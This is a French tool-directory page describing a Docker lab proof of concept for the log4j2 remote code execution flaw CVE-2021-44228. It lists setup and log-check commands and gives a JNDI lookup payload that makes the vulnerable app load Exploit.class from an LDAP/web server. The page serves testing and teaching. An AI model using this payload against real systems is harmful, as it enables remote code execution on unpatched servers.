Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j-rce-CVE-2021-44228 — log4j2 CVE-2021-44228 POC | Kitploit
Outils/GitHubGitHub/1hakusai1/log4j-rce-cve-2021-44228
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHub1hakusai1/log4j-rce-cve-2021-44228

log4j-rce-CVE-2021-44228

log4j2 CVE-2021-44228 POC

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Aperçu

Projet pour tester la vulnérabilité d'exécution de code à distance de log4j2 (CVE-2021-44228).

Lancer les conteneurs

root@kitploit:~
docker-compose up

Le conteneur log4j prend un peu de temps pour être prêt après le démarrage. Vérifiez la progression avec la commande suivante :

root@kitploit:~
docker logs -f log4j

Lorsque Server started: Listening on port 8081 s'affiche, il est prêt.

Vérifier l'état avant l'attaque

Vérifiez le répertoire /root du conteneur log4j :

root@kitploit:~
docker exec log4j ls /root

Initialement, seul le répertoire work est présent.

Télécharger l’outil

Effectuer l'attaque

Accédez à http://localhost:8081/. C'est une application simple qui affiche le nom saisi dans le formulaire à l'écran et dans les logs.

Saisissez ${jndi:ldap://ldap.example.com/cn=java,dc=example,dc=com} dans le formulaire et soumettez-le.

Vérifiez le répertoire /root du conteneur log4j :

root@kitploit:~
docker exec log4j ls /root

Le code préparé par l'attaquant a été exécuté et des fichiers qui n'existaient pas auparavant devraient être créés. Comme les noms de fichiers sont basés sur des horodatages, de nouveaux fichiers sont ajoutés à chaque attaque.

En consultant les logs du conteneur ldap, vous pouvez voir qu'une requête SEARCH provient du conteneur log4j :

root@kitploit:~
docker logs ldap

En consultant les logs tomcat du conteneur web, vous pouvez voir un accès à Exploit.class (la classe utilisée pour l'attaque) depuis le conteneur log4j :

root@kitploit:~
docker exec -it web bash
cat /usr/local/tomcat/logs/localhost_access_log.*